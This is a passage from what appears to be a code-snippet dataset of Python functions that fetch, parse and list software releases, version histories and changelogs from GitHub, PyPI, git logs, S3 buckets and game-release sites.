avail_releases = [\"latest\"]\n avail_releases.extend(release[\"tag_name\"] for release in releases)\n return avail_releases", "def get_releases(platform, year, month):\n platform_num = PLATFORMS.get(platform.lower(), 0)\n\n if platform_num == 0:\n url = _3DJUEGOS_RELEASES_URL + \"todos/por-mes/0/{}/{}/\".format(year, month)\n else:\n url = _3DJUEGOS_RELEASES_URL + platform + \\\n \"/por-mes/{}/{}/{}/\".format(platform_num, year, month)\n\n soup = get_soup_obj(url)\n if not soup:\n return None\n results = {}\n results[\"games\"] = []\n root = soup.find(\"div\", {\"class\": \"pad_rl10\"})\n for div in root.findAll(\"div\"):\n if div.attrs[\"class\"] == [\"s20\", \"ffnav\", \"b\", \"mar_t50\"]:\n release_date = \"{}-{}-{}\".format(year, month,\n re.search(r'\\d+', div.span.text).group())\n elif div.attrs[\"class\"] == [\"dtc\", \"vam\"]:\n name = div.a.span.text\n platform = div.div.span.text\n results[\"games\"].append(\n {\"name\": name, \"platform\": platform, \"releaseDate\": release_date})\n\n return results", "def list_releases(self, name):\n endpoint = '/v1/charm/{}/releases'.format(name)\n response = self._client.get(endpoint)\n\n channel_map = []\n for item in response['channel-map']:\n expires_at = item['expiration-date']\n if expires_at is not None:\n # `datetime.datetime.fromisoformat` is available only since Py3.7\n expires_at = parser.parse(expires_at)\n channel_map.append(\n Release(revision=item['revision'], channel=item['channel'], expires_at=expires_at))\n\n channels = [\n Channel(\n name=item['name'],\n fallback=item['fallback'],\n track=item['track'],\n risk=item['risk'],\n branch=item['branch'],\n ) for item in response['package']['channels']]\n\n revisions = [_build_revision(item) for item in response['revisions']]\n\n return channel_map, channels, revisions", "def get_from_releases(releases: List[Tuple[str, str, str]]) -> List[str]:\n output = []\n client = redis.Redis(host=os.environ.get('REDIS_HOST', 'localhost'))\n\n for release in releases:\n key_name = _title_to_key(release[0])\n url = client.get(key_name)\n\n if url is not None:\n output.append('<a href=\"https://horriblesubs.info{url}\">{0}</a> – {2}'.format(*release, url=url.decode()))\n\n else:\n output.append(''.join(release))\n\n return output", "def extract_release_data(self):\r\n data = None\r\n session = self.get_session()\r\n project = session.create(self._config.name)\r\n \r\n session.home = self._config['dir']\r\n \r\n result = self.__find_project(project)\r\n if (result != None) and (self._config.get_boolean('releasable', False)):\r\n if 'baseline.release' in self._config:\r\n data = {}\r\n _logger.info(\"Releasing: '%s'\" % result)\r\n data['name'] = result.objectname\r\n data['database'] = session.database()\r\n data['role'] = ccm.get_role_for_purpose(session, str(self._config['purpose']))\r\n data['dir'] = os.path.normpath(self._config['dir'])\r\n data['pst'] = result.name\r\n data['release'] = self._config['baseline.release']\r\n else:\r\n _logger.warning(\"Could not release \" + result.objectname + \" because the 'baseline.release' property is missing.\")\r\n return data", "def get_bookable_releases(context, data_dict):\n # noinspection PyUnresolvedReferences\n frc = _get_or_bust(data_dict, 'frc')\n\n lc = ckanapi.LocalCKAN(context=context)\n\n results = lc.action.package_search(\n q='frc:{frc} AND type:publication'.format(\n frc=frc\n ),\n fl=[\n 'product_id_new',\n 'title'\n ]\n )\n\n final_results = []\n for result in results['results']:\n article_results = lc.action.package_search(\n q=(\n 'top_parent_id:{pid} '\n # Only \"Working Copy\" results.\n 'AND status_code:31 '\n # With a release_date set to anything (not blank)\n 'AND last_release_date:[* TO *] '\n 'AND type:article'\n ).format(\n pid=result['product_id_new']\n ),\n sort='issue_number_int asc',\n # FIXME: We need to actually paginate on this, but the daily\n # team will not accept it (yet).\n rows=2000000\n )\n\n for art_result in article_results['results']:\n final_results.append({\n 'productId': result['product_id_new'],\n 'issue': art_result['issue_number_int'],\n 'title': result['title'],\n 'refper': result['reference_period']\n })\n\n return final_results", "def get_release_files(tag_name, config) -> Tuple[List[ReleaseFile], Dict[str, SourceFile]]:\n\n @retry_multi(5)\t# retry at most 5 times\n def execute_request(path):\n \"\"\"!\n @brief Performs a GET request with the given path. To be used with Github's REST API.\n @returns If successful, returns a .JSON object\n \"\"\"\n headers = {\n \"Accept\": \"application/vnd.github.v3+json\"\n }\n url = \"https://api.github.com\" + path\n\n # GET https://api.github.com/<path> Accept: \"application/vnd.github.v3+json\"\n\n response = requests.get(url, headers=headers, timeout=GLOBAL_TIMEOUT)\n\n response.raise_for_status() # Raise a RequestException if we failed, and trigger retry\n\n return response.json()\n\n build_group_regex = re.compile(\"fs2_open_.*-builds-([^.-]*)(-([^.]*))?.*\") # regex for matching binary .zip's and .7z's\n source_file_regex = re.compile(\"fs2_open_.*-source-([^.]*)?.*\") # regex for matching source .zip's and .7z's\n\n # Get the github release metadata of the given tag name\n response = execute_request(\n \"/repos/{}/releases/tags/{}\".format(config[\"github\"][\"repo\"], tag_name))\n\n # Extract the binary and source files from the response[\"asset\"] metadata\n binary_files = []\n source_files = {}\n for asset in response[\"assets\"]:\n url = asset[\"browser_download_url\"]\n name = asset[\"name\"]\n\n group_match = build_group_regex.match(name)\n\n if group_match is not None:\n platform = group_match.group(1)\n # x64 is the Visual Studio name but for consistency we need Win64\n if platform == \"x64\":\n platform = \"Win64\"\n\n binary_files.append(ReleaseFile(name, url, platform, group_match.group(3)))\n else:\n group_match = source_file_regex.match(name)\n\n if group_match is None:\n continue\n\n group = group_match.group(1)\n\n source_files[group] = SourceFile(name, url, group)\n\n binary_files.sort(key=lambda ReleaseFile: ReleaseFile.name)\n\n return binary_files, source_files", "async def get_releases(\n self, prerelease: bool = False, returnlimit: int = 5\n ) -> [\"AIOGitHubAPIRepositoryRelease\"] or list:\n _endpoint = f\"/repos/{self.full_name}/releases\"\n\n response = await self.client.get(endpoint=_endpoint)\n contents = []\n\n for content in response or []:\n if len(contents) == returnlimit:\n break\n if not prerelease:\n if content.get(\"prerelease\", False):\n continue\n contents.append(AIOGitHubAPIRepositoryRelease(content))\n\n return contents", "def get_release(repo, tag=\"latest\", quiet=False) -> dict:\n api_url = f\"https://api.github.com/repos/{owner}/{repo}\"\n req_url = (\n f\"{api_url}/releases/latest\"\n if tag == \"latest\"\n else f\"{api_url}/releases/tags/{tag}\"\n )\n request = get_request(req_url)\n releases = None\n num_tries = 0\n\n while True:\n num_tries += 1\n try:\n with urllib.request.urlopen(request, timeout=10) as resp:\n result = resp.read()\n remaining = int(resp.headers[\"x-ratelimit-remaining\"])\n if remaining <= 10:\n warnings.warn(\n f\"Only {remaining} GitHub API requests remaining \"\n \"before rate-limiting\"\n )\n break\n except urllib.error.HTTPError as err:\n if err.code == 401 and os.environ.get(\"GITHUB_TOKEN\"):\n raise ValueError(\"GITHUB_TOKEN env is invalid\") from err\n elif err.code == 403 and \"rate limit exceeded\" in err.reason:\n raise ValueError(\n f\"use GITHUB_TOKEN env to bypass rate limit ({err})\"\n ) from err\n elif err.code == 404:\n if releases is None:\n releases = get_releases(repo, quiet)\n if tag not in releases:\n raise ValueError(\n f\"Release {tag} not found (choose from {', '.join(releases)})\"\n )\n elif err.code == 503 and num_tries < max_http_tries:\n # GitHub sometimes returns this error for valid URLs, so retry\n warnings.warn(f\"URL request {num_tries} did not work ({err})\")\n continue\n raise RuntimeError(f\"cannot retrieve data from {req_url}\") from err\n\n release = json.loads(result.decode())\n tag_name = release[\"tag_name\"]\n if not quiet:\n print(f\"fetched release {tag_name!r} info from {owner}/{repo}\")\n\n return release", "def _grab_history(self):\n self.data['history_lines'] = []\n self.data['history_file'] = None\n self.data['history_encoding'] = None\n self.data['headings'] = []\n self.data['history_last_release'] = ''\n self.data['history_insert_line_here'] = 0\n default_location = None\n config = self.setup_cfg.config\n if config and config.has_option('zest.releaser', 'history_file'):\n default_location = config.get('zest.releaser', 'history_file')\n history_file = self.vcs.history_file(location=default_location)\n self.data['history_file'] = history_file\n if not history_file:\n logger.warn(\"No history file found\")\n return\n logger.debug(\"Checking %s\", history_file)\n history_lines, history_encoding = read_text_file(history_file)\n history_lines = history_lines.split('\\n')\n headings = utils.extract_headings_from_history(history_lines)\n if not headings:\n logger.warn(\"No detectable version heading in the history \"\n \"file %s\", history_file)\n return\n self.data['history_lines'] = history_lines\n self.data['history_encoding'] = history_encoding\n self.data['headings'] = headings\n\n # Grab last header.\n start = headings[0]['line']\n if len(headings) > 1:\n # Include the next header plus underline, as this is nice\n # to show in the history_last_release.\n end = headings[1]['line'] + 2\n else:\n end = len(history_lines)\n history_last_release = '\\n'.join(history_lines[start:end])\n self.data['history_last_release'] = history_last_release\n\n # Add line number where an extra changelog entry can be inserted. Can\n # be useful for entry points. 'start' is the header, +1 is the\n # underline, +2 is probably an empty line, so then we should take +3.\n # Or rather: the first non-empty line.\n insert = start + 2\n while insert < end:\n if history_lines[insert].strip():\n break\n insert += 1\n self.data['history_insert_line_here'] = insert", "def get_history():\n return response_texts_to_entries(make_post_request(HISTORY_API, data={\"k\": config[\"api_key\"]}))", "def extract_release_data(self):\r\n data = None\r\n session = self.get_session()\r\n project = session.create(self._config.name)\r\n \r\n session.home = self._config['dir']\r\n \r\n if self._config.get_boolean('releasable', False):\r\n if 'baseline.release' in self._config:\r\n data = {}\r\n _logger.info(\"Releasing: '%s'\" % project)\r\n data['name'] = project.objectname\r\n data['database'] = session.database()\r\n data['role'] = ccm.get_role_for_purpose(session, str(self._config['purpose']))\r\n data['dir'] = os.path.normpath(self._config['dir'])\r\n data['pst'] = project.name\r\n data['release'] = self._config['baseline.release']\r\n else:\r\n _logger.warning(\"Could not release \" + project + \" because the 'baseline.release' property is missing.\")\r\n return data", "async def fetch_data(self) -> GitHubReleaseModel | None:\n result = await self._client.repos.releases.list(\n self.repository, **{\"params\": {\"per_page\": 1}}\n )\n if not result.data:\n return None\n\n for release in result.data:\n if not release.prerelease:\n return release\n\n # Fall back to the latest release if no non-prerelease release is found\n return result.data[0]", "def versions(self) -> List['RadsProjectVersion']:\n logger.debug(f\"retrieve versions of {self}\")\n listing = self.storage.request_text(f\"{self.path}/releaselisting\")\n return [RadsProjectVersion(self, RadsVersion(l)) for l in listing.splitlines()]", "def post_import():\n\n validate_request_json(request)\n\n releases = []\n for r in request.json:\n # Get the platform, create if it doesn't exist\n platforms = []\n for p in r['platforms']:\n try:\n query = db.session.query(Platform).filter(Platform.name == p)\n platform = query.one()\n except exc.NoResultFound:\n app.logger.info(\"Creating platform {}\".format(p))\n platform = Platform(p)\n db.session.add(platform)\n platforms.append(platform)\n\n release = Release(\n platforms=platforms,\n user=r['user'],\n team=r.get('team'),\n references=json.dumps(r.get('references')),\n )\n\n release.stime = arrow.get(r['stime']) if r.get('stime') else None\n release.ftime = arrow.get(r['ftime']) if r.get('ftime') else None\n if release.ftime and release.stime:\n release.duration = release.ftime - release.stime\n\n notes = r.get('notes')\n if notes:\n for n in notes:\n note = ReleaseNote(release.id, n)\n db.session.add(note)\n\n for p in r['packages']:\n package = Package(\n release_id=release.id,\n name=p['name'],\n version=p['version'],\n )\n\n package.rollback = p.get('rollback')\n package.status = p.get('status')\n package.diff_url = p.get('diff_url')\n\n if p.get('stime'):\n package.stime = arrow.get(p['stime'])\n else:\n package.stime = arrow.get(r['stime'])\n package.ftime = arrow.get(p['ftime']) if p.get('ftime') else None\n if package.stime and package.ftime:\n package.duration = package.ftime - package.stime\n\n db.session.add(package)\n\n db.session.add(release)\n db.session.commit()\n\n releases.append(release.id)\n\n return jsonify({'releases': [str(x) for x in releases]}), 200", "def ls(_):\n client = utils.s3_client()\n\n projects = []\n\n config = utils.get_config()\n bucket = config[\"release\"][\"s3_bucket\"]\n deploys = config[\"deploy\"]\n\n resp = client.list_objects_v2(Bucket=bucket)\n for data in resp.get(\"Contents\", []):\n name = data[\"Key\"]\n\n projects.append(name)\n\n projects = sorted(projects)\n\n _projects = []\n\n for name in projects:\n try:\n release = get_release(client, bucket, name)\n except InvalidRelease:\n continue\n\n data = {\n \"Name\": name,\n \"Latest Release\": f\"v{release.version} {release.timestamp} ({release.commit})\",\n }\n\n for env_name, cfg in deploys.items():\n env_version, env_commit, env_timestamp = get_deployed_version(\n client, cfg[\"s3_bucket\"], name\n )\n\n data[env_name.title()] = f\"v{env_version} {env_timestamp} ({env_commit})\"\n\n _projects.append(data)\n\n projects = _projects\n\n utils.printfmt(projects)", "def get_last_release_id():\n url = \"https://api.github.com/repos/yt-dlp/yt-dlp/releases/latest\"\n try:\n with urlopen(url, timeout=10) as resp:\n return json.loads(resp.read().decode(\"utf-8\")).get(\"tag_name\", \"0\")\n except URLError as e:\n log(f\"YouTubeDLHelper error [get last release id]: {e}\")", "def test_yum_history(self):\n repo_history = ospsurvey.probes.software.get_yum_history()\n\n print(\"Yum History: {}\".format(json.dumps(repo_history)))", "def BPM_PROVHISTORY():\n return download_from_archive(\"bpm_20220128_gmos-s_Ham_11_full_12amp.fits\")", "def test_get_all_available_release_updates(self):\n self._ucr({\n 'repository/online/component/a': 'yes',\n 'repository/online/component/a/version': 'current',\n })\n self._uri({\n '%d.%d/maintained/%d.%d-%d/all/Packages.gz' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): DATA,\n '%d.%d/maintained/component/%s/all/Packages.gz' % (MAJOR, MINOR + 1, 'a'): DATA,\n '%d.%d/maintained/%d.%d-%d/all/Packages.gz' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): DATA,\n })\n versions, component = self.u.get_all_available_release_updates()\n self.assertEqual(['%d.%d-%d' % (MAJOR, MINOR + 1, 0)], versions)\n self.assertEqual('a', component)", "def get_release_info(self):\r\n return self.detail_info.get_release_info(self.version)", "def get_versions():\n ret_obj = {'versions': picard_versions(current_app)}\n return make_response(jsonify(ret_obj), 200)", "def latest_github_release(username: str, repo: str) -> GitHubReleaseResponse:\n url = f'https://api.github.com/repos/{username}/{repo}/releases/latest'\n response = requests.get(url)\n if response.status_code != 200:\n print(f'Error: {response.status_code}', file=sys.stderr)\n sys.exit(1)\n try:\n decoded_json = response.json()\n return GitHubReleaseResponse(decoded_json)\n except requests.exceptions.JSONDecodeError:\n print('Error: Unable to parse JSON from GitHub releases', file=sys.stderr)\n sys.exit(1)", "def get(package):\n url = Pypi.url()\n url = url.format(package=package)\n\n # Request Pypi\n resp = requests.get(url)\n if resp.status_code != requests.codes.ok:\n return dict(status=\"failure\", message=\"Invalid Package\")\n\n data = dict()\n resp = resp.json()\n releases = resp.get(\"releases\", [])\n data[\"releases\"] = releases\n data[\"status\"] = \"success\"\n\n return data", "def get_linked_versions(version='current'):\n version = check_version_str(version)\n chapters = [10, 9, 8]\n version_page = 'https://research.cs.wisc.edu/htcondor/manual/{ver}/{chapter}_Version_History.html'\n r = requests.get(version_page.format(ver=version, chapter=chapters[0]))\n if r.status_code == 404:\n # Try different chapter numbers, as it changes for different versions\n i = 1\n while r.status_code == 404 and i < len(chapters):\n r = requests.get(version_page.format(ver=version, chapter=chapters[i]))\n i += 1\n if r.status_code == 404:\n return []\n soup_vers = bs4.BeautifulSoup(r.text, 'lxml')\n versions = [x.text.replace('Version ', '')\n for x in soup_vers.find_all('a')\n if x.text.startswith('Version')]\n return versions", "def get_build_infos(self, start_rev, end_rev, range=60*60*4):\n pushlogs_finder = self._create_pushlog_finder(start_rev, end_rev)\n\n pushlogs = pushlogs_finder.get_pushlogs()\n\n if not pushlogs:\n return []\n\n start_time = pushlogs[0]['date']\n end_time = pushlogs[-1]['date']\n \n build_urls = [(\"%s%s/\" % (self.build_base_url, path), timestamp)\n for path, timestamp in self._extract_paths()]\n\n build_urls_in_range = filter(lambda (u, t): t > (start_time - range)\n and t < (end_time + range), build_urls)\n\n raw_revisions = [push['changesets'][-1] for push in pushlogs]\n all_builds = []\n with futures.ThreadPoolExecutor(max_workers=8) as executor:\n futures_results = {}\n for build_url, timestamp in build_urls_in_range:\n future = executor.submit(self._get_valid_builds,\n build_url,\n timestamp,\n raw_revisions)\n futures_results[future] = build_url\n for future in futures.as_completed(futures_results):\n if future.exception() is not None:\n sys.exit(\"Retrieving valid builds from %r generated an\"\n \" exception: %s\" % (futures_results[future],\n future.exception()))\n all_builds.extend(future.result())\n\n return self._sort_builds(all_builds)", "def get_releases_by_application(self, application_id):\n status_code_dict = {codes.ok: ReleaseListResponse}\n return self.get_request(RELEASES_URL.format(application_id=application_id),\n status_code_response_class_dict=status_code_dict)", "def get_release_data(user, repo, field=None, regex_pattern=None, group_number=0):\n response = requests.get(f\"https://api.github.com/repos/{user}/{repo}/releases/latest\")\n release_data_dict = json.loads(response.text)\n\n if field:\n field_value = release_data_dict[field]\n if regex_pattern is None:\n output = field_value\n else:\n output = re.search(regex_pattern, field_value).group(group_number)\n else:\n output = release_data_dict\n\n return output", "def cache_from_releases(releases: List[dict]) -> None:\n client = redis.Redis(host=os.environ.get('REDIS_HOST', 'localhost'))\n\n for release in (r for r in releases if r.get('url')): # filter out releases without a url\n key_name = _title_to_key(release['title'])\n client.setex(key_name, ONE_DAY, release['url'])", "def get_versions(self):\n # They randomly use and don't use 'r' prefix so we have to sort\n # versions manually\n versions = list(self._get_github_tags())\n versions.sort(\n key=operator.attrgetter('base_version'),\n reverse=True,\n )\n return versions", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def list_releases(\n self,\n ) -> Callable[\n [cloud_deploy.ListReleasesRequest], cloud_deploy.ListReleasesResponse\n ]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"list_releases\" not in self._stubs:\n self._stubs[\"list_releases\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/ListReleases\",\n request_serializer=cloud_deploy.ListReleasesRequest.serialize,\n response_deserializer=cloud_deploy.ListReleasesResponse.deserialize,\n )\n return self._stubs[\"list_releases\"]", "def software_releases_repository():\n\n pipelines = [ingest_pipeline, populate_dm_pipeline, asset_experimentation]\n schedules = [] # [my_hourly_schedule]\n sensors = [] # [my_sensor]\n\n return pipelines + schedules + sensors", "def gettime(self, tag):\n cmd = ['git', 'log', '--pretty=format:\"%ct\"', \"-1\", tag]\n p = Popen(cmd, cwd=self.filename, stdout=PIPE)\n data, res = p.communicate()\n if data == b'':\n return [], []\n time_stamp = []\n this_tag = []\n for seconds in data.decode(\"utf-8\").split(\"\\n\"):\n month = round((int(seconds.strip('\"')) - ReleaseTime.base) / ReleaseTime.month_time)\n if month not in time_stamp:\n time_stamp.append(month)\n this_tag.append(tag[0:4])\n else:\n pass\n return time_stamp, this_tag", "def release_dates(self, **kwargs):\n path = self._get_movie_id_path('release_date')\n resp = self._get_method(path, kwargs)\n return resp", "def _parse_release_count(self, resp: Dict[str, Any]) -> str:\n return f\"{len(resp.get('releases', []))}\"", "def get_release_info(self, release):\n rel_os = release.operating_system.lower()\n version = release.version\n\n release_info = filter(\n lambda r: (\n r['os'] == rel_os and\n ClusterPlugins.is_release_version_compatible(version,\n r['version'])),\n self.plugin.releases)\n\n return release_info[0]", "def aggregate_git_log(path, progress_callback=lambda progress: None):\n versions = list()\n\n current_version, current_commits = None, list()\n\n log_data = git_log_hash(path)\n log_length = len(log_data)\n progress_step = max(1, log_length / 100)\n \n for idx, (rev_hash, date, msg) in enumerate(log_data):\n if idx % progress_step == 0:\n progress_callback(float(idx) / log_length)\n \n current_commits.append(msg)\n if git_checkout(path=path, revision_hash=rev_hash):\n version = get_package_metadata(path=path, field_name='Version')\n if version != current_version:\n # memorize it\n versions.insert(0,\n dict(version=version,\n date=datetime.strptime(date.rsplit(' ', 1)[0], '%Y-%m-%d %H:%M:%S'),\n sections=[dict(notes='',\n items=list(reversed(current_commits)))]))\n\n current_version, current_commits = version, list()\n\n if current_commits:\n versions.insert(0,\n dict(version='newest',\n date=None,\n sections=[dict(notes='',\n items=list(reversed(current_commits)))]))\n\n return versions", "def get_history_queue():\n response = houston.get(\"/history/queue\")\n houston.raise_for_status_with_json(response)\n return response.json()", "def versions():\n result = timeline.versions()\n if result:\n click.echo('\\n'.join(result))", "def git_stats_release(project: Project, release: Release) -> GitStats:\n return _git_stats(project, f\"{release.tag_name}~1\", release.tag_name)", "def get_recent_release_for_page(self, page, PER_PAGE):\n\t\tconnection = self.connect_to_db()\n\t\tcursor = connection.cursor()\n\t\toffset = (page - 1) * 15\n\t\tcursor.execute('''select * from movies where release_year = 2016 order by weighted desc limit %d offset %d;''' % (PER_PAGE, offset))\n\t\trows = cursor.fetchall()\n\t\tconnection.close()\n\t\treturn self.convert_to_json(rows)", "def universePayoutHistory(universeId, startDate, endDate):\n url = f\"https://engagementpayouts.roblox.com/v1/universe-payout-history?endDate={endDate}&startDate={startDate}&universeId={universeId}\"\n r = requests.get(url, cookies=cookie)\n j = json.loads(r.text)\n return j", "def history(self) -> List[Dict[str, Any]]:\n\n response = self.client.get(f\"/images/{self.id}/history\")\n body = response.json()\n\n if response.status_code == 200:\n return body\n\n if response.status_code == 404:\n raise ImageNotFound(body[\"cause\"], response=response, explanation=body[\"message\"])\n raise APIError(body[\"cause\"], response=response, explanation=body[\"message\"])", "def main(\n req_files,\n verbose=False,\n outdated=False,\n latest=False,\n verbatim=False,\n repo=None,\n path=\"requirements.txt\",\n token=None,\n branch=\"master\",\n url=None,\n delay=None,\n):\n requirements = []\n\n if repo:\n github_url = build_github_url(repo, branch, path, token)\n req_file = get_requirements_file_from_url(github_url)\n requirements.extend(parse_req_file(req_file))\n elif url:\n req_file = get_requirements_file_from_url(url)\n requirements.extend(parse_req_file(req_file))\n else:\n for req_file in req_files:\n requirements.extend(parse_req_file(req_file, verbatim=verbatim))\n req_file.close()\n\n total_time_delta = 0\n max_outdated_time = 0\n results = []\n\n for req, version, ignore in requirements:\n if verbatim and not req:\n results.append(version)\n elif req:\n results.append(\n {\n \"req\": req,\n \"version\": version,\n \"ignore\": ignore,\n \"latest\": request(get_pypi_url(req)),\n \"specified\": request(get_pypi_url(req, version)),\n }\n )\n\n for result in results:\n if isinstance(result, str):\n print(result.replace(\"\\n\", \"\"))\n continue\n\n if result[\"ignore\"]:\n if verbatim:\n print(\"{}=={} # norot\".format(result[\"req\"], result[\"version\"]))\n else:\n print(\"Ignoring updates for {}. \".format(result[\"req\"]))\n continue\n\n req = result[\"req\"]\n version = result[\"version\"]\n\n latest_version, latest_release_date = get_version_and_release_date(\n req, verbose=verbose, response=result[\"latest\"]\n )\n specified_version, specified_release_date = get_version_and_release_date(\n req, version, response=result[\"specified\"]\n )\n\n if latest_release_date and specified_release_date:\n time_delta = (latest_release_date - specified_release_date).days\n total_time_delta = total_time_delta + time_delta\n max_outdated_time = max(time_delta, max_outdated_time)\n\n if verbose:\n if time_delta > 0:\n print(\n \"{} ({}) is {} days out of date. \"\n \"Latest is {}\".format(req, version, time_delta, latest_version)\n )\n elif version != latest_version:\n print(\n \"{} ({}) is out of date. \"\n \"Latest is {}\".format(req, version, latest_version)\n )\n elif not outdated:\n print(\"{} ({}) is up to date\".format(req, version))\n\n if latest and latest_version != specified_version:\n print(\n \"{}=={} # Updated from {}\".format(\n req, latest_version, specified_version\n )\n )\n elif verbatim and latest_version != specified_version:\n print(\n \"{}=={} # Latest {}\".format(req, specified_version, latest_version)\n )\n elif verbatim:\n print(\"{}=={}\".format(req, specified_version))\n\n elif verbatim:\n print(\"{}=={} # Error checking latest version\".format(req, version))\n\n verbatim_str = \"\"\n if verbatim:\n verbatim_str = \"# Generated with piprot {}\\n# \".format(VERSION)\n\n if total_time_delta > 0 and delay is None:\n print(\n \"{}Your requirements are {} \"\n \"days out of date\".format(verbatim_str, total_time_delta)\n )\n sys.exit(1)\n elif delay is not None and max_outdated_time > int(delay):\n print(\n \"{}At least one of your dependencies is {} \"\n \"days out of date which is more than the allowed\"\n \"{} days.\".format(verbatim_str, max_outdated_time, delay)\n )\n sys.exit(1)\n elif delay is not None and max_outdated_time <= int(delay):\n print(\n \"{}All of your dependencies are at most {} \"\n \"days out of date.\".format(verbatim_str, delay)\n )\n else:\n print(\n \"{}Looks like you've been keeping up to date, \"\n \"time for a delicious beverage!\".format(verbatim_str)\n )", "def get_details(self, repo=None):\n api_json = []\n\n #get all branches from this repo\n branches = self.make_branches(self.getBranch(repo))\n\n today = datetime.date.today()\n yesterday = today - datetime.timedelta(2)\n\n for branch in branches:\n args = {\"per_page\": \"100\",\n \"sha\": branch,\n \"author\": self.username,\n \"since\": yesterday.isoformat()}\n args = self.make_args(args)\n repo_url = \"/\".join([self.url, \"repos\", repo, \"commits\"])\n repo_url = repo_url + args\n\n request = urllib2.Request(repo_url, headers=self.headers)\n response = urllib2.urlopen(request)\n raw_data = response.read()\n commits_info = self.process_factory(simplejson.loads(raw_data))\n api_json = api_json + commits_info\n\n print repo_url\n\n print api_json\n return api_json", "def get_resource_last_update_timestamp(api_1_0_url, resource):\n try:\n r = requests.get(api_1_0_url)\n json_string = r.content\n data = json.loads(json_string)\n try:\n files = data['files']\n for entry in files:\n if entry['path'] == resource:\n entry_last_update_timestamp = entry['utctimestamp']\n return entry_last_update_timestamp\n except Exception as error:\n print(\"Caught error: \" + repr(error))\n except Exception as error:\n print(\"Failed to connect to bitbucket: \" + repr(error))\n exit(1)\n return None", "def get_video_title_releaser_release_time(self, url):\n video_id = ' '.join(re.findall('id.*html', url))\n browser = webdriver.Chrome()\n browser.get(url)\n title = browser.find_element_by_id('subtitle').text\n releaser = browser.find_element_by_id('module_basic_sub').text\n releaser = releaser.replace('+订阅','')\n releaser = releaser.replace(' ','')\n try:\n rt_midstep = browser.find_element_by_class_name('video-status').text\n rt_midstep = rt_midstep.replace('上传于','')\n rt_midstep = rt_midstep.replace(' ','')\n release_time = int(datetime.datetime.strptime(rt_midstep,'%Y-%m-%d').timestamp()*1e3)\n except:\n release_time = 0\n fetch_time = int(datetime.datetime.timestamp(datetime.datetime.now())*1e3)\n D0 = {'video_id': video_id,\n 'title': title,\n 'release_time': release_time,\n 'url': url,\n 'fetch_time': fetch_time}\n return D0", "def get_revision_list(self):\n response = self._get_request(\n DeckhandClient.get_path(DeckhandPaths.REVISION_LIST)\n )\n self._handle_bad_response(response)\n revisions = yaml.safe_load(response.text)\n return revisions.get('results', [])", "def all(data):\n result = list()\n for release, info in data.items():\n version = release\n python_version = Pypi._get_python_version(info)\n d = dict(version=version, python_version=python_version)\n result.append(d)\n\n return result", "def downloads_per_version(package):\n downloads = {}\n for release in package['files']:\n downloads[release['version']] = release['ndownloads']\n return downloads", "def transformar_data_to_json():\n\t# La lista de releases regresa como un <str>\n\tdeployedReleases = subprocess.check_output([\"/usr/bin/bash\",\"/usr/local/bin/gsdGetRCinServer.sh\"])\n\ttimeZoneInfo = subprocess.check_output([\"date\",\"+%Z\"]).strip()\n\n\t# Separamos el <str> por lineas\n\tdeployedReleases = deployedReleases.split()\n\n\t# Generamos diccionario inicial\n\thostname = (socket.gethostname())\n communicate = { 'server' : hostname,\n 'date': today,\n 'timezone': timeZoneInfo, \n 'applications': {} \n }\n\n\t# Parseamos todos los despliegues encontrados\n\tfor release in deployedReleases:\n\n\t\t# sanetizar los datos, debemos eliminar los \".\" dado que son representaciones especiales en mongo, el path tampoco nos importa porque es estandar\n\t\trelease = release.replace('/opt/company/deploy/', '')\n\t\trelease = release.replace('.', '-')\n\n\t\t# Verificamos si es un symlink (current es version actual desplegada)\n\t\tif 'current' in release :\n\t\t\tmarker, appAndVersion = release.split('|')\n if appAndVersion.count('/') > 1 :\n rcversion = 'RC Format is wrong'\n appname = marker.replace('/current', '')\n else:\n appname, rcversion = appAndVersion.split('/')\n\n\t\t\tif appname not in communicate['applications'] :\n\t\t\t\tcommunicate['applications'].update( { \n\t\t\t\t\t\t\t\tappname: \n\t\t\t\t\t\t\t\t\t{rcversion : 'current'} \n\t\t\t\t\t\t\t } )\n\t\t\telse:\n\t\t\t\tcommunicate['applications'][appname].update({rcversion : 'current'})\n\n\t\t# Verificamos si es un symlink (rollback es la version previa a current)\n\t\telif 'rollback' in release:\n\t\t\tmarker, appAndVersion = release.split('|')\n if appAndVersion.count('/') > 1 :\n rcversion = 'RC Format is wrong'\n appname = marker.replace('/rollback', '')\n else:\n appname, rcversion = appAndVersion.split('/')\n\n\t\t\tif appname not in communicate['applications'] :\n\t\t\t\tcommunicate['applications'].update( { \n\t\t\t\t\t\t\t\tappname: \n\t\t\t\t\t\t\t\t\t{rcversion : 'rollback'} \n\t\t\t\t\t\t\t } )\n\t\t\telse:\n\t\t\t\tcommunicate['applications'][appname].update({rcversion : 'rollback'})\n\n\t\t# Lo que no es current o rollback es un despliegue mas viejo\n\t\telse :\n appname, rcversion = release.split('/')\n if appname not in communicate['applications'] :\n communicate['applications'].update( {\n appname:\n {rcversion : 'previous'}\n } )\n else:\n if rcversion not in communicate['applications'][appname] :\n communicate['applications'][appname].update({rcversion : 'previous'})\n else :\n # La version ya fue registrada como current o rollback, esto sucede porque el symlink comparte el mismo nombre que el directorio real a nivel dict\n pass\n\n\treturn communicate", "def show_release_details(release):\n def get(key, dictionary=release):\n try:\n return dictionary[key]\n except KeyError as e:\n return None\n\n date = get('date')\n date = date[:4] if date else \"\"\n print(\"{} / {} ({})\".format(get('artist-credit-phrase'), get('title'), date))\n print()\n\n # print track list\n track_lists = [get(\"track-list\", medium) for medium in release['medium-list']]\n track_list = [track for tracks in track_lists for track in tracks]\n track_width = max([len(track[\"recording\"][\"title\"]) for track in track_list])\n time_width = len(get_time(sum([int(track[\"length\"]) for track in track_list])))\n\n total_ms = 0\n for idx,track in enumerate(track_list):\n title = track[\"recording\"][\"title\"]\n ms = int(track[\"length\"])\n time = get_time(ms)\n total = get_time(total_ms)\n print(\"{:2d}. {:{track_width}} {:>{time_width}} ({})\".format( \\\n idx+1, title, total, time, track_width=track_width, time_width=time_width))\n total_ms += ms\n width = 5 + track_width + time_width\n 